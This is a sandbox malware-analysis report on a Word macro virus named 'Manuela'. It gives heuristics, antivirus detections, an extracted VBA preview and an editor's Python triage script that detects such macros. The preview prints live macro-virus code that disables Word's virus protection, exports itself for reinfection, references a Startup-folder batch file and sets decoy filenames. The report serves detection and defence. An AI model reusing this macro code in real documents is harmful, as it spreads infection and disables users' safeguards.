MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious OLE (Word) document carrying VBA macros with AutoOpen and Auto_Close entry points. The extracted 'Manuela' routine runs under On Error Resume Next, turns off Word's macro virus warning (Options.VirusProtection = False), suppresses the Normal template save prompt, exports its own module to c:\Manuela.drv (a staging copy for reinfecting other documents), reads the Normal template's file attributes, references a batch file under the Windows Startup folder (c:\windows\startm~1\programs\startup\msfile.bat), overwrites the document Author field with "Readme", picks a random decoy filename (porno.doc, readme!.doc or sex.doc) and has date-triggered branches (a December call and a 17 July "Manuela is 17 !!!" message box). Most of the visible source is junk: assignments that concatenate never-defined identifiers with Int(Rnd * N). This is filler that varies the code between copies rather than an encoded payload, which is consistent with the per-artifact obfuscation check rating an embedded payload unlikely. The preview is truncated, so what the startup .bat is used for is not visible here, and nothing in the visible part downloads a second stage. The ClamAV detections (Win.Trojan.Pivis-2 on the document, Doc.Trojan.Vmpc-1 on the extracted macro source) corroborate the verdict.
Heuristics (5)
- ClamAV: Win.Trojan.Pivis-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Pivis-2
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): the OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN)
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | ClamAV detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 64242 bytes | bfbb09d691ffcabb6984f4bc11e8171f5cacf420da535f9de6166c7665fdf705 | Doc.Trojan.Vmpc-1 | unlikely |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Manuela"
Sub Manuela()
On Error Resume Next
Randomize
sv = Int(Rnd * 3) + 1
If sv = 1 Then svt$ = "porno.doc"
If sv = 3 Then svt$ = "readme!.doc"
If sv = 2 Then svt$ = "sex.doc"
UsEoVgKv = UiUt11709 & HmIn7730
IpUi10290 = UiUt11709 & BqTe6576 & Int(Rnd * 7793)
RrVn3588 = DvTzRjCg & KzQz9188 & Int(Rnd * 2527)
RrVn3588 = KhIu7369 & KzQz9188 & Int(Rnd * 3812)
UnTz3410 = GeKe14820 & VsLi17336 & Int(Rnd * 8167)
KhTuQjTw = GlUe9172 & GnMs9323
MpTq4803 = GlUe9172 & HuGm14936 & Int(Rnd * 7863)
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
VBE.ActiveVBProject.VBComponents("Manuela").Export "c:\Manuela.drv"
RpUe6243 = QqIkQqAo & NuJn4083 & Int(Rnd * 724)
RpUe6243 = EoJu2364 & NuJn4083 & Int(Rnd * 955)
CgHz8684 = LqQwJzEu & EgEp14649 & RqOwRqEw & HpDx11314
CgHz8684 = HpDx11314 & EgEp14649 & Int(Rnd * 4211)
QwBk4696 = HvVzMwFv & MfSi12772 & Int(Rnd * 5161)
QwBk4696 = AiGg6151 & MfSi12772 & Int(Rnd * 5920)
ActiveDocument.ReadOnlyRecommended = False
BfFqMuRo = IgNj8349 & RfGh13422
ShLs17516 = IgNj8349 & GjBf10447 & Int(Rnd * 3554)
OqFnThCr = MqOj10739 & PiRy8200
IhJv11053 = MqOj10739 & AwEf5529 & Int(Rnd * 3766)
HxHq9017 = IoJwEsKi & IeGm10210 & Int(Rnd * 5916)
HxHq9017 = PrQi5723 & IeGm10210 & Int(Rnd * 5193)
LqUr11219 = BhQyRpKv & OkQo8309 & LlDjRmOm & FgUm7944
LqUr11219 = FgUm7944 & OkQo8309 & Int(Rnd * 4257)
InOt19088 = AxOkTlAh & DtBe9899 & Int(Rnd * 9096)
InOt19088 = NqAz15248 & DtBe9899 & Int(Rnd * 8894)
DqFg = Int(Rnd * 100)
If DqFg = 99 Then MsgBox "Perfect !", vbSystemModal
NuGuIkOs = BsVz15822 & JsVu10684
BpNo9123 = BsVz15822 & MiEh7405 & Int(Rnd * 7365)
UtSz6230 = OeMpMlGw & CmEt10041 & Int(Rnd * 290)
UtSz6230 = RvIf14097 & CmEt10041 & Int(Rnd * 6030)
ArMzMqBz = EgNj3704 & GzJf11337
OkFu4624 = EgNj3704 & EyLi8116 & Int(Rnd * 2448)
If Month(Now()) = 12 Then Call FqFl1072DzRp
MnCfFnGx = UgMy8855 & AwJk11076
UmJr13920 = UgMy8855 & CnGn9780 & Int(Rnd * 5023)
TfCk8028 = BiPh2384 & IeSk2892 & Int(Rnd * 410)
GtRvTtCg = HnIm13951 & MgQz12329
PuOp14278 = HnIm13951 & CgQz13483 & Int(Rnd * 6312)
FgAf7053 = HxGkJkDo & UnNz9612 & Int(Rnd * 5350)
FgAf7053 = SpPw7311 & UnNz9612 & Int(Rnd * 551)
NqNt9587 = ToGlRxKo & HqDx3271 & Int(Rnd * 1178)
NqNt9587 = QgKl3940 & HqDx3271 & Int(Rnd * 597)
FgDg3981 = MpUsClFx & UiIt10397 & Int(Rnd * 3575)
FgDg3981 = HpEh13037 & UiIt10397 & Int(Rnd * 3571)
If Month(Now()) = 7 And Day(Now()) = 17 Then MsgBox "Manuela is 17 !!!", vbInformation, "Birthday Greeting!!!"
HfCf7564 = FeRgLgHn & NsUr7025 & Int(Rnd * 3210)
HfCf7564 = IuEw14266 & NsUr7025 & Int(Rnd * 7177)
MjEhRqIn = QtMj15010 & DnAw7002
IlHm6528 = QtMj15010 & GjNz3128 & Int(Rnd * 8770)
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Readme"
.Subject = " "
.Execute
End With
KzOyCnDq = SwDq13116 & RqCx14208
TiFu12301 = SwDq13116 & GgUr18781 & Int(Rnd * 6287)
EqPy16979 = OoCvQsOo & DuSl9923 & Int(Rnd * 4935)
EqPy16979 = UqJe7784 & DuSl9923 & Int(Rnd * 6849)
EeAs9706 = TsSqHrBw & AhGn14505 & KoLmKtTl & LxQv12305
EeAs9706 = LxQv12305 & AhGn14505 & Int(Rnd * 7693)
FoRmBeTe = ArEp16803 & HeTv12433
DfDt13051 = ArEp16803 & HoLj18663 & Int(Rnd * 7107)
JoUr5819$ = "c:\windows\startm~1\programs\startup\msfile.bat"
JnIv13873 = BlMj10017 & DpUp8234 & Int(Rnd * 1629)
IsPu18836 = SzQfOqCw & GiLj3390 & Int(Rnd * 9111)
IsPu18836 = NlJm10253 & GiLj3390 & Int(Rnd * 9777)
VhEq10723706 = GetAttr(NormalTemplate.FullName)
JjRvUiGi = AuBr14435 & TiBi12094
PmIi8897 = AuBr14435 & CzNo14007 & Int(Rnd * 8325)
CmJe8433 = HtSrEiGn & HrPu8140 & CyRmAqPy & HkMj6319
CmJe8433 = HkMj6319 & HrPu8140 & Int(Rnd * 5094)
If VhEq10723706 = vbReadOnly And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(JoU
... (truncated)
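The heuristics above fire on exactly the patterns visible in this preview: auto-execution entry points, the module self-export, the disabled virus warning, the Normal template touch, the Startup folder path and the date triggers, surrounded by junk concatenation. The script below is an added example by the editor, not the analyzer's code, that reimplements that triage over decoded VBA text and, separately, over raw document bytes (because Word 6/95 WordBasic macros are not a VBA project and can be missed by VBA extraction, as the legacy-marker heuristic warns). SAMPLE_MACRO and RAW_SAMPLE are constructed inputs modelled on the preview; the indicator names, weights and verdict thresholds are the editor's own choices.

```python
"""Triage a macro dump such as macros.bas above.

Added example by the editor, not code from the analyzer or the report.
triage() scores decoded VBA text (what olevba emits); scan_raw() looks for
auto-exec and WordBasic names in raw OLE bytes so legacy macros still surface.
"""
import re

# Constructed excerpt modelled on the preview above; the real dump is 64 KB.
SAMPLE_MACRO = r'''Attribute VB_Name = "Manuela"
Sub Manuela()
On Error Resume Next
Randomize
UsEoVgKv = UiUt11709 & HmIn7730
IpUi10290 = UiUt11709 & BqTe6576 & Int(Rnd * 7793)
Options.VirusProtection = False
Options.SaveNormalPrompt = False
VBE.ActiveVBProject.VBComponents("Manuela").Export "c:\Manuela.drv"
ActiveDocument.ReadOnlyRecommended = False
If Month(Now()) = 12 Then Call FqFl1072DzRp
JoUr5819$ = "c:\windows\startm~1\programs\startup\msfile.bat"
VhEq10723706 = GetAttr(NormalTemplate.FullName)
End Sub
Sub AutoOpen()
Call Manuela
End Sub
Sub AutoClose()
Call Manuela
End Sub
'''

# Constructed bytes: OLE magic, a "Macros" name, a UTF-16LE WordBasic marker
# and an ASCII AutoOpen.  Not a real document, just enough to exercise scan_raw().
RAW_SAMPLE = (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 16 + b"Macros\x00"
              + "ToolsMacro".encode("utf-16-le") + b"\x00\x00AutoOpen\x00")

IDENT = r"[A-Za-z][A-Za-z0-9]*"

# indicator -> (weight, regex), matched per line, case-insensitive.  Weights are
# the editor's assumptions, not the analyzer's scoring.
INDICATORS = {
    "auto_exec":        (2, re.compile(r"^\s*(Public\s+|Private\s+)?Sub\s+(Auto_?(Open|Close|Exec|New|Exit)|Document_(Open|Close))\b", re.I)),
    "vbe_self_export":  (3, re.compile(r"VBE\.ActiveVBProject\.VBComponents\(.+\)\.Export", re.I)),
    "disable_security": (3, re.compile(r"Options\.VirusProtection\s*=\s*False", re.I)),
    "normal_template":  (2, re.compile(r"NormalTemplate\.|Options\.SaveNormalPrompt\s*=\s*False", re.I)),
    "startup_folder":   (3, re.compile(r"\\programs\\startup\\", re.I)),
    "date_trigger":     (1, re.compile(r"\b(Month|Day)\(Now\(\)\)\s*=", re.I)),
    "wordbasic_marker": (2, re.compile(r"\b(ToolsMacro|MacroFile|fileMacro|globMacro)\b", re.I)),
}

# Junk filler as seen in the preview: "X = A & B & Int(Rnd * N)" built from
# identifiers that are never assigned anywhere.
JUNK_ASSIGN = re.compile(
    rf"^\s*{IDENT}\$?\s*=\s*{IDENT}(\s*&\s*{IDENT})+(\s*&\s*Int\(Rnd\s*\*\s*\d+\))?\s*$")


def triage(source: str) -> dict:
    """Return findings (indicator -> 1-based line numbers), a score, junk-code
    statistics and a verdict for decoded VBA text."""
    hits = {name: [] for name in INDICATORS}
    statements = junk = 0
    for lineno, line in enumerate(source.splitlines(), 1):
        text = line.strip()
        if not text or text.startswith("'") or text.startswith("Attribute "):
            continue
        statements += 1
        if JUNK_ASSIGN.match(line):
            junk += 1  # polymorphic noise, not a decoder
        for name, (_, rx) in INDICATORS.items():
            if rx.search(line):
                hits[name].append(lineno)
    findings = {n: ls for n, ls in hits.items() if ls}
    score = sum(INDICATORS[n][0] for n in findings)
    persistence = {"vbe_self_export", "disable_security", "normal_template", "startup_folder"}
    if "auto_exec" in findings and persistence & findings.keys():
        verdict = "malicious"  # auto-run plus a self-propagation/persistence step
    elif findings:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {
        "findings": findings,
        "score": score,
        "junk_lines": junk,
        "junk_ratio": round(junk / statements, 2) if statements else 0.0,
        "verdict": verdict,
    }


def scan_raw(data: bytes) -> set:
    """Find auto-exec and WordBasic marker names in raw file bytes, in both
    ASCII and UTF-16LE, independent of any VBA project parsing."""
    markers = ("AutoOpen", "AutoClose", "AutoExec", "ToolsMacro",
               "MacroFile", "fileMacro", "globMacro")
    lower = data.lower()  # bytes.lower() only touches ASCII letters, which is what we want
    found = set()
    for m in markers:
        for enc in ("ascii", "utf-16-le"):
            if m.lower().encode(enc) in lower:
                found.add(m)
    return found


if __name__ == "__main__":
    report = triage(SAMPLE_MACRO)
    print(report["verdict"], report["score"], sorted(report["findings"]))
    print(sorted(scan_raw(RAW_SAMPLE)))
```

On the constructed excerpt the text pass reports the auto-exec subs, the self-export, the disabled virus warning, the Normal template touches, the Startup folder path and the December trigger, and the raw pass recovers the UTF-16LE ToolsMacro marker that a VBA-only extractor would not see. Run scan_raw() over the original .doc, not over macros.bas, when the legacy-marker heuristic fires.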